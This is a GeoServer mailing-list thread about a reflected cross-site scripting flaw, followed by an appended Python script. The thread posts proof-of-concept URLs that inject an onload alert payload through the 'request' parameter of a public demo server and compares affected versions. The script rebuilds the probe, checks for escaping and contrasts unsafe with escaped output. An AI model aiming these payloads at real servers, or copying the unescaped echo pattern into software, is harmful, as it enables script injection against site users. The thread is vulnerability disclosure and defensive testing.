This one:

http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"


triggers on my 2.5-snapshot (8th May) and my 2.4.3.

None of the others trigger on either 2.4.3 or the snapshot for me.

===========

I'm not sure I'd agree with Andrea's assessment of there only being two
ways to divulge a bug. Per my original post, there is the third way:
Responsible disclosure, and it is compatible with Open Source. The notion
behind it is that only developers get informed of the bug until a patch is
ready so as to minimise the risk of raising awareness/use by blackhats
before it can be defended against. Once a patch is developed (in a timely
fashion!), information is disclosed to all.
There are advantages and disadvantages to all methods.

Cheers,
Jonathan




On 9 May 2014 16:30, Russell Hore <[email protected]> wrote:

> I just tried that on my 2.5 box and got a popup with css in it.
>
>
>    -  Build Information
>       - Version 2.5
>       - Git Revision 8cf3edcf5f61db010f7ad3fcb4613e7c0eabeaff
>       - Build Date 18-Mar-2014 16:08
>       - GeoTools Version 11.0 (rev
>       fb9a2d3f88315d076523788cb8196ec89bb253f9)
>       - GeoWebCache Version 1.5.1 (rev
>       1.5.x/64246c20a4ada1c954b17d23b9447408d1c5432f)
>
>
>
> Russ
>
> On 9 May 2014, at 16:17, Isakson Mats <[email protected]> wrote:
>
>
> http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&VERSION=1.0
>
>
>
>
> ------------------------------------------------------------------------------
> Is your legacy SCM system holding you back? Join Perforce May 7 to find
> out:
> • 3 signs your SCM is hindering your productivity
> • Requirements for releasing software faster
> • Expert tips and advice for migrating your SCM now
> http://p.sf.net/sfu/perforce
> _______________________________________________
> Geoserver-users mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/geoserver-users
>
>

-- 
This transmission is intended for the named addressee(s) only and may 
contain confidential, sensitive or personal information and should be 
handled accordingly. Unless you are the named addressee (or authorised to 
receive it for the addressee) you may not copy or use it, or disclose it to 
anyone else. If you have received this transmission in error please notify 
the sender immediately. All email traffic sent to or from us, including 
without limitation all GCSX traffic, may be subject to recording and/or 
monitoring in accordance with relevant legislation.
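As an added example (not code from this thread and not GeoServer's own code), the script below builds the probe URL quoted above with proper percent-encoding, classifies a response body by whether the payload's markup comes back verbatim or only entity-escaped, and contrasts the unsafe way of echoing the `request` value into an exception report with the escaped one. The ServiceExceptionReport text is a constructed approximation, not a capture from demo.opengeo.org, and the classifier assumes the parameter is echoed somewhere in the body.

```python
"""Probe builder and response checker for the reflected-XSS report in this thread.

Added example, not GeoServer code. The exception-report text is a constructed
approximation of an OWS ServiceExceptionReport, not a capture from a server.
"""
from urllib.parse import urlencode, quote, urlparse, parse_qs
from xml.sax.saxutils import escape

# Decoded form of the payload in the URLs quoted above: it closes the attribute
# and element it lands in, then injects an XHTML-namespaced <body onload=...>
# so a browser rendering the XML response runs the script.
PAYLOAD = ("\";><a xmlns:a='http://www.w3.org/1999/xhtml'>"
           "<a:body onload=\"alert('xss')\"/></a><\"")

# Substring whose verbatim presence means the markup survived unescaped.
ACTIVE_MARKER = "<a:body onload=\"alert("


def build_probe_url(base, service="WFS", version="1.0"):
    """Return the probe URL with the payload percent-encoded (no hand quoting)."""
    params = {"SERVICE": service, "request": PAYLOAD, "VERSION": version}
    return base.rstrip("/") + "/ows?" + urlencode(params, quote_via=quote)


def extract_request_param(url):
    """Decode the request parameter back out of a probe URL (round-trip check)."""
    return parse_qs(urlparse(url).query)["request"][0]


def classify_response(body):
    """Classify a response body:
    'reflected-raw'     : the active markup is present verbatim (vulnerable)
    'reflected-escaped' : it is present only as entities (inert text)
    'absent'            : the parameter was not echoed at all
    """
    if ACTIVE_MARKER in body:
        return "reflected-raw"
    escaped_variants = (
        escape(ACTIVE_MARKER),                   # &lt;a:body onload="alert(
        escape(ACTIVE_MARKER, {'"': "&quot;"}),  # &lt;a:body onload=&quot;alert(
    )
    if any(v in body for v in escaped_variants):
        return "reflected-escaped"
    return "absent"


# Constructed exception-report skeleton (assumed shape, not GeoServer's output).
XML_HEAD = ('<?xml version="1.0" ?>\n'
            '<ServiceExceptionReport version="1.2.0">\n'
            '  <ServiceException code="InvalidParameterValue" locator="request">')
XML_TAIL = "</ServiceException>\n</ServiceExceptionReport>\n"


def render_exception_unsafe(request_name):
    """Bug class under discussion: user input concatenated straight into XML."""
    return XML_HEAD + "Unknown request: " + request_name + XML_TAIL


def render_exception_safe(request_name):
    """Same report with the input entity-escaped, so the markup is inert text."""
    return (XML_HEAD + "Unknown request: "
            + escape(request_name, {'"': "&quot;"}) + XML_TAIL)


if __name__ == "__main__":
    print(build_probe_url("http://demo.opengeo.org/geoserver"))
    for name, body in (("unsafe", render_exception_unsafe(PAYLOAD)),
                       ("safe", render_exception_safe(PAYLOAD))):
        print(name, "->", classify_response(body))
```

Pointing `classify_response` at a real response is the check to run against each of the versions mentioned in the thread: a result of `reflected-raw` reproduces the popup, `reflected-escaped` means the echo is still there but harmless, and `absent` means the parameter is no longer reflected at all.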